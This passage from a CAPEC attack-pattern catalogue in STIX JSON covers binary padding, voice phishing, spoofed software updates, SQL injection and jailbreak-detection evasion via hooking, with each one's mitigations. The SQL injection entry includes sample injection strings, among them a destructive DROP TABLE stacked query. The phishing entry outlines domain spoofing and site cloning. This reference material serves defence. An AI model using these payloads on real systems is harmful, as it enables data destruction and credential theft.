"created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--941eef6d-7520-4cb3-97db-3e53b6e58b9d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c40d7d86-ab26-4e1a-9b9b-e3496f0f36fc", + "target_ref": "attack-pattern--f7a0e7bd-d24a-4390-b365-9e71f22e4e06", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary adds data to a file to increase the file size beyond what security tools are capable of handling in an attempt to mask their actions.\n In addition to this, adding data to a file also changes the file's hash, frustrating security tools that look for known bad files by their hash.\n ", + "external_references": [ + { + "external_id": "CAPEC-655", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/655.html" + }, + { + "description": "Obfuscated Files or Information:Binary padding", + "external_id": "T1027.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027/001" + } + ], + "id": "attack-pattern--cbe9fd1f-4b5d-4a3c-b20b-e49888457338", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Avoid Security Tool Identification by Adding Data", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--31b90554-68d8-4950-ac45-89c915a30716" + ], + "x_capec_consequences": { + "Accountability": [ + "Hide Activities", + "Bypass Protection Mechanism" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Adding data to change the checksum of a file and can be used to avoid hash-based denylists and static anti-virus signatures.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary targets users with a phishing attack for the purpose of soliciting account passwords or sensitive information from the user. Voice Phishing is a variation of the Phishing social engineering technique where the attack is initiated via a voice call, rather than email. The user is enticed to provide sensitive information by the adversary, who masquerades as a legitimate employee of the alleged organization. Voice Phishing attacks deviate from standard Phishing attacks, in that a user doesn't typically interact with a compromised website to provide sensitive information and instead provides this information verbally. Voice Phishing attacks can also be initiated by either the adversary in the form of a \"cold call\" or by the victim if calling an illegitimate telephone number.", + "external_references": [ + { + "external_id": "CAPEC-656", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/656.html" + }, + { + "description": "Jovi Umawing, Something else is phishy: How to detect phishing attempts on mobile phones , 2018--12---10, Malwarebytes", + "external_id": "REF-592", + "source_name": "reference_from_CAPEC", + "url": "https://blog.malwarebytes.com/101/2018/12/something-else-phishy-detect-phishing-attempts-mobile/" + }, + { + "description": "Jennifer van der Kleut, What is vishing? Tips for spotting and avoiding voice scams, NortonLifeLock Inc.", + "external_id": "REF-594", + "source_name": "reference_from_CAPEC", + "url": "https://ieeexplore.ieee.org/document/6604058/authors#authors" + }, + { + "description": "What Is Vishing?, AO Kaspersky Lab", + "external_id": "REF-595", + "source_name": "reference_from_CAPEC", + "url": "https://www.kaspersky.com/resource-center/definitions/vishing" + } + ], + "id": "attack-pattern--ec0a802f-1d0a-4360-a4d8-3fb9f48715d0", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Voice Phishing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_alternate_terms": [ + "Vishing", + "VoIP Phishing" + ], + "x_capec_child_of_refs": [ + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "The target receives an email or text message stating that their Apple ID has been disabled due to suspicious activity and that the included link includes instructions on how to unlock their Apple account. The link in the text message looks legitimate and once the link is clicked, the user is redirected to a legitimate-looking webpage that prompts the user to call a specified number to initiate the unlock process. The target initiates the phone call and provides their credentials or other sensitive information to the individual they assume works for Apple. Now that the adversary possess this data, it can be used to log into the account to obtain other sensitive data, such as Apple Pay information.", + "An adversary calls the target and claims to work for their bank. The adversary informs the target that their bank account has been frozen, due to potential fraudulent spending, and requires authentication in order to re-enable the account. The target, believing the caller is a legitimate bank employee, provides their bank account login credentials to confirm they are the authorized owner of the account. The adversary then confirms this authentication and claims that the account has been unlocked. Once the adversary has obtained these credentials, money can be transferred from the victim's account to an account controlled by the adversary." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Obtain domain name and certificate to spoof legitimate site: This optional step can be used to help the adversary impersonate the legitimate organization more convincingly. The adversary can use homograph or similar attacks to convince users that they are using the legitimate website. If the adversary leverages cold-calling for this attack, this step is skipped.

    2. Techniques
    Optionally obtain a domain name that visually looks similar to the legitimate organization's domain name. An example is www.paypaI.com vs. www.paypal.com (the first one contains a capital i, instead of a lower case L)
    Optionally obtain a legitimate SSL certificate for the new domain name.

  2. Explore legitimate website and create duplicate: An adversary optionally creates a website (optionally at a URL that looks similar to the original URL) that closely resembles the organization's website that they are trying to impersonate. That website will contain a telephone number for the victim to call to assist them with their issue and initiate the attack. If the adversary leverages cold-calling for this attack, this step is skipped.

    3. Techniques
    Use spidering software to get copy of web pages on legitimate site.
    Manually save copies of required web pages from legitimate site.
    Create new web pages that have the legitimate site's look and feel, but contain completely new content.

Exploit

  1. Convince user to provide sensitive information to the adversary.: An adversary \"cold calls\" the victim or receives a call from the victim via the malicious site and provides a call-to-action, in order to persuade the user into providing sensitive details to the adversary (e.g. login credentials, bank account information, etc.). The key is to get the victim to believe that the individual they are talking to is from a legitimate entity with which the victim does business and that the call is occurring for legitimate reasons. A call-to-action will usually need to sound legitimate and urgent enough to prompt action from the user.

    2. Techniques
    Call the user a from a spoofed legitimate-looking telephone number.

  2. Use stolen information: Once the adversary obtains the sensitive information, this information can be leveraged to log into the victim's bank account and transfer money to an account of their choice, or to make fraudulent purchases with stolen credit card information.

    3. Techniques
    Login to the legitimate site using another the victim's supplied credentials
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "An adversary needs phone numbers to initiate contact with the victim, in addition to a legitimate-looking telephone number to call the victim from.", + "An adversary needs to correctly guess the entity with which the victim does business and impersonate it. Most of the time phishers just use the most popular banks/services and send out their \"hooks\" to many potential victims.", + "An adversary needs to have a sufficiently compelling call to action to prompt the user to take action.", + "If passively conducting this attack via a spoofed website, replicated website needs to look extremely similar to the original website and the URL used to get to that website needs to look like the real URL of the said business entity." + ], + "x_capec_resources_required": [ + "Legitimate-looking telephone number(s) to initiate calls with victims" + ], + "x_capec_skills_required": { + "Medium": "Basic knowledge about websites: obtaining them, designing and implementing them, etc." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not accept calls from unknown numbers or from numbers that may be flagged as spam. Also, do not call numbers that appear on-screen after being unexpectedly redirected to potentially malicious websites. In either case, do not provide sensitive information over voice calls that are not legitimately initiated. Instead, call your Bank, PayPal, eBay, etc., via the number on their public-facing website and inquire about the problem.", + "id": "course-of-action--6e3af87a-42f6-4c03-85e4-aaa333a97b18", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-656-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--244a5166-f226-4066-b561-6df35600a91c", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6e3af87a-42f6-4c03-85e4-aaa333a97b18", + "target_ref": "attack-pattern--ec0a802f-1d0a-4360-a4d8-3fb9f48715d0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attackers uses identify or content spoofing to trick a client into performing an automated software update from a malicious source. A malicious automated software update that leverages spoofing can include content or identity spoofing as well as protocol spoofing. Content or identity spoofing attacks can trigger updates in software by embedding scripted mechanisms within a malicious web page, which masquerades as a legitimate update source. Scripting mechanisms communicate with software components and trigger updates from locations specified by the attackers' server. The result is the client believing there is a legitimate software update available but instead downloading a malicious update from the attacker.", + "external_references": [ + { + "external_id": "CAPEC-657", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/657.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "description": "Software Deployment Tools", + "external_id": "T1072", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1072" + } + ], + "id": "attack-pattern--9b9760ba-c8de-42c7-9de0-3a5ee2d2abdb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Automated Software Update via Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_child_of_refs": [ + "attack-pattern--3c9e7b88-a1eb-4cfd-aa34-10df08b23317" + ], + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands" + ], + "Availability": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "An example of the spoofing strategy would be the eTrust Antivirus Webscan Automated Update Remote Code Execution vulnerability (CVE-2006-3976) and (CVE-2006-3977) whereby an ActiveX control could be remotely manipulated by an attacker controlled web page to download and execute the attackers' code without integrity checking." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack exploits target software that constructs SQL statements based on user input. An attacker crafts input strings so that when the target software constructs SQL statements based on the input, the resulting SQL statement performs actions other than those the application intended. SQL Injection results from failure of the application to appropriately validate input.", + "external_references": [ + { + "external_id": "CAPEC-66", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/66.html" + }, + { + "external_id": "CWE-89", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/89.html" + }, + { + "external_id": "CWE-1286", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1286.html" + }, + { + "description": "SQL Injection", + "external_id": "19", + "source_name": "WASC", + "url": "http://projects.webappsec.org/SQL-Injection" + }, + { + "description": "SQL Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/SQL_Injection" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-607", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.html" + } + ], + "id": "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "SQL Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2fb2b2b8-b7de-45a2-aadb-5849d12fda8f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "With PHP-Nuke versions 7.9 and earlier, an attacker can successfully access and modify data, including sensitive contents such as usernames and password hashes, and compromise the application through SQL Injection. The protection mechanism against SQL Injection employs a denylist approach to input validation. However, because of an improper denylist, it is possible to inject content such as \"foo'/**/UNION\" or \"foo UNION/**/\" to bypass validation and glean sensitive information from the database. See also: CVE-2006-5525" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey application: The attacker first takes an inventory of the functionality exposed by the application.

    2. Techniques
    Spider web sites for all available links
    Sniff network communications with application using a utility such as WireShark.

Experiment

  1. Determine user-controllable input susceptible to injection: Determine the user-controllable input susceptible to injection. For each user-controllable input that the attacker suspects is vulnerable to SQL injection, attempt to inject characters that have special meaning in SQL (such as a single quote character, a double quote character, two hyphens, a parenthesis, etc.). The goal is to create a SQL query with an invalid syntax.

    2. Techniques
    Use web browser to inject input through text fields or through HTTP GET parameters.
    Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc.
    Use network-level packet injection tools such as netcat to inject input
    Use modified client (modified by reverse engineering) to inject input.

  2. Experiment with SQL Injection vulnerabilities: After determining that a given input is vulnerable to SQL Injection, hypothesize what the underlying query looks like. Iteratively try to add logic to the query to extract information from the database, or to modify or delete information in the database.

    3. Techniques
    Use public resources such as \"SQL Injection Cheat Sheet\" at http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/, and try different approaches for adding logic to SQL queries.
    Add logic to query, and use detailed error messages from the server to debug the query. For example, if adding a single quote to a query causes an error message, try : \"' OR 1=1; --\", or something else that would syntactically complete a hypothesized query. Iteratively refine the query.
    Use \"Blind SQL Injection\" techniques to extract information about the database schema.
    If a denial of service attack is the goal, try stacking queries. This does not work on all platforms (most notably, it does not work on Oracle or MySQL). Examples of inputs to try include: \"'; DROP TABLE SYSOBJECTS; --\" and \"'); DROP TABLE SYSOBJECTS; --\". These particular queries will likely not work because the SYSOBJECTS table is generally protected.

Exploit

  1. Exploit SQL Injection vulnerability: After refining and adding various logic to SQL queries, craft and execute the underlying SQL query that will be used to attack the target system. The goal is to reveal, modify, and/or delete database data, using the knowledge obtained in the previous step. This could entail crafting and executing multiple SQL queries if a denial of service attack is the intent.

    2. Techniques
    Craft and Execute underlying SQL query
", + "x_capec_extended_description": "\n When specially crafted user-controlled input consisting of SQL syntax is used without proper validation as part of SQL queries, it is possible to glean information from the database in ways not envisaged during application design. Depending upon the database and the design of the application, it may also be possible to leverage injection to have the database execute system-related commands of the attackers' choice. SQL Injection enables an attacker to interact directly to the database, thus bypassing the application completely. Successful injection can cause information disclosure as well as ability to add or modify data in the database.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--89acf77d-723b-43b4-b66d-6eaafed52369", + "attack-pattern--f0e32d0e-9580-4b79-95e0-6e3b99bf6e45", + "attack-pattern--7c90bef7-530c-427b-8fb7-f9d3eda9c26a", + "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "attack-pattern--9116da7f-a60e-4186-b42a-218f1b0eb269" + ], + "x_capec_prerequisites": [ + "SQL queries used by the application to store, retrieve or modify data.", + "User-controllable input that is not properly validated by the application as part of SQL queries." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "It is fairly simple for someone with basic SQL knowledge to perform SQL injection, in general. In certain instances, however, specific knowledge of the database employed may be required." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as SQL content. Keywords such as UNION, SELECT or INSERT must be filtered in addition to characters such as a single-quote(') or SQL-comments (--) based on the context in which they appear.", + "id": "course-of-action--07cbed26-8c96-41e6-a239-7be587a38673", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-66-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a93f8f1b-9607-4383-9b6f-7be3de09fc48", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--07cbed26-8c96-41e6-a239-7be587a38673", + "target_ref": "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use of parameterized queries or stored procedures - Parameterization causes the input to be restricted to certain domains, such as strings or integers, and any input outside such domains is considered invalid and the query fails. Note that SQL Injection is possible even in the presence of stored procedures if the eventual query is constructed dynamically.", + "id": "course-of-action--3b3ecd49-a48b-4908-b854-071ac6b15f1c", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-66-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5fc50ca5-d17c-4f39-96d4-795ef6ac0bb1", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3b3ecd49-a48b-4908-b854-071ac6b15f1c", + "target_ref": "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--df5e28f8-bb74-4412-960d-bef6cec27c9f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--618c2d85-ca76-40a0-a019-0ac9ba1b0989", + "target_ref": "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary forces a non-restricted mobile application to load arbitrary code or code files, via Hooking, with the goal of evading Root/Jailbreak detection. Mobile device users often Root/Jailbreak their devices in order to gain administrative control over the mobile operating system and/or to install third-party mobile applications that are not provided by authorized application stores (e.g. Google Play Store and Apple App Store). Adversaries may further leverage these capabilities to escalate privileges or bypass access control on legitimate applications. Although many mobile applications check if a mobile device is Rooted/Jailbroken prior to authorized use of the application, adversaries may be able to \"hook\" code in order to circumvent these checks. Successfully evading Root/Jailbreak detection allows an adversary to execute administrative commands, obtain confidential data, impersonate legitimate users of the application, and more.", + "external_references": [ + { + "external_id": "CAPEC-660", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/660.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + }, + { + "description": "Process Injection", + "external_id": "T1055", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1055" + }, + { + "description": "Ansgar Kellner, Micha Horlboge, Konrad Rieck, Christian Wressnegger, False Sense of Security: A Study on the Effectivity of Jailbreak Detection in Banking Apps, 2019--06---17, Technische Universität Braunschweig", + "external_id": "REF-624", + "source_name": "reference_from_CAPEC", + "url": "https://cybersecurity.att.com/blogs/security-essentials/mobile-phishing" + }, + { + "description": "San-Tsai Sun, Andrea Cuadros, Konstantin Beznosov, Android Rooting: Methods, Detection, and Evasion, 2019--06---17, Technische Universität Braunschweig", + "external_id": "REF-625", + "source_name": "reference_from_CAPEC", + "url": "http://lersse-dl.ece.ubc.ca/record/310/files/p3.pdf?subformat=pdfa" + }, + { + "description": "Jose Lopes, Who owns your runtime?, 2015--10---12, Nettitude Labs", + "external_id": "REF-626", + "source_name": "reference_from_CAPEC", + "url": "https://labs.nettitude.com/blog/ios-and-android-runtime-and-anti-debugging-protections/#hooking" + }, + { + "description": "Suresh Khutale, Android Root Detection Bypass by Reverse Engineering APK, 2018--03---06, InfoSec Institute", + "external_id": "REF-627", + "source_name": "reference_from_CAPEC", + "url": "https://resources.infosecinstitute.com/topic/android-root-detection-bypass-reverse-engineering-apk/" + } + ], + "id": "attack-pattern--fa4feb09-657b-40a0-9edd-6187b55047e3", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Root/Jailbreak Detection Evasion via Hooking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--80649f3c-d2f3-4703-9e78-e096673a7517" + ], + "x_capec_child_of_refs": [ + "attack-pattern--283d665d-e109-4d5d-8993-6fb25e5923d6" + ], + "x_capec_consequences": { + "Access_Control": [ + "Read Data (An adversary may leverage Root/Jailbreak Detection Evasion via Hooking in order to obtain sensitive information.)" + ], + "Authorization": [ + "Execute Unauthorized Commands (Through Root/Jailbreak Detection Evasion via Hooking, the adversary compromises the integrity of the application.)", + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data (An adversary may leverage Root/Jailbreak Detection Evasion via Hooking in order to obtain sensitive information.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Through Root/Jailbreak Detection Evasion via Hooking, the adversary compromises the integrity of the application.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An adversary targets a non-restricted iOS banking application in an attempt to compromise sensitive user data. The adversary creates Objective-C runtime code that always returns \"false\" when checking for the existence of the Cydia application. The malicious code is then dynamically loaded into the application via the DYLD_INSERT_LIBRARIES environment variable. When the banking applications checks for Cydia, the hooked code returns \"false\", so the application assumes the device is stock (i.e. not Jailbroken) and allows it to access the application. However, the adversary has just evaded Jailbreak detection and is now able to glean user credentials and/or transaction details.", + "An adversary targets a mobile voting application on an Android device with the goal of committing voter fraud. Leveraging the Xposed framework, the adversary is able to create and hook Java code into the application that bypasses Root detection methods. When the voting application attempts to detect a Rooted device by checking for commonly known installed packages associated with Rooting, the hooked code removes the suspicious packages before returning to the application. As a result, the application believes the device is stock (i.e. not Rooted) when in actuality this is not the case. Having evading Root detection, the adversary is now able to cast votes for the candidate of their choosing as a variety of different users." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify application with attack potential: The adversary searches for and identifies a mobile application that could be exploited for malicious purposes (e.g. banking, voting, or medical applications).

    2. Techniques
    Search application stores for mobile applications worth exploiting

Experiment

  1. Develop code to be hooked into chosen target application: The adversary develops code or leverages existing code that will be hooked into the target application in order to evade Root/Jailbreak detection methods.

    2. Techniques
    Develop code or leverage existing code to bypass Root/Jailbreak detection methods.
    Test the code to see if it works.
    Iteratively develop the code until Root/Jailbreak detection methods are evaded.

Exploit

  1. Execute code hooking to evade Root/Jailbreak detection methods: Once hooking code has been developed or obtained, execute the code against the target application to evade Root/Jailbreak detection methods.

    2. Techniques
    Hook code into the target application.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The targeted application must be non-restricted to allow code hooking." + ], + "x_capec_resources_required": [ + "The adversary must have a Rooted/Jailbroken mobile device.", + "The adversary needs to have enough access to the target application to control the included code or file." + ], + "x_capec_skills_required": { + "High": "Knowledge about Root/Jailbreak detection and evasion techniques.", + "Medium": "Knowledge about code hooking." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure mobile applications are signed appropriately to avoid code inclusion via hooking.", + "id": "course-of-action--a26576b7-5508-45c7-b841-988783c129d3", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-660-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3ed05e0f-72dd-495e-af10-e186067c014b", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a26576b7-5508-45c7-b841-988783c129d3", + "target_ref": "attack-pattern--fa4feb09-657b-40a0-9edd-6187b55047e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Inspect the application's memory for suspicious artifacts, such as shared objects/JARs or dylibs, after other Root/Jailbreak detection methods.", + "id": "course-of-action--ab5ae276-92d5-4d92-8409-8a4400de6800", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-660-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--66be5c7d-d8d0-490b-93f7-33a6b9a2ee47", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ab5ae276-92d5-4d92-8409-8a4400de6800", + "target_ref": "attack-pattern--fa4feb09-657b-40a0-9edd-6187b55047e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Inspect the application's stack trace for suspicious method calls.", + "id": "course-of-action--43850af6-9f1d-4bb9-a858-9d516bf243f7", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-660-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--625a5ed4-6a77-4589-80db-7eb242928389", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--43850af6-9f1d-4bb9-a858-9d516bf243f7", + "target_ref": "attack-pattern--fa4feb09-657b-40a0-9edd-6187b55047e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Allow legitimate native methods, and check for non-allowed native methods during Root/Jailbreak detection methods.", + "id": "course-of-action--d8677776-34d9-4dae-add9-a6e12cfc342e", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-660-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6aaf6432-9f26-4d24-9622-96e8a784c382", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d8677776-34d9-4dae-add9-a6e12cfc342e", + "target_ref": "attack-pattern--fa4feb09-657b-40a0-9edd-6187b55047e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "For iOS applications, ensure application methods 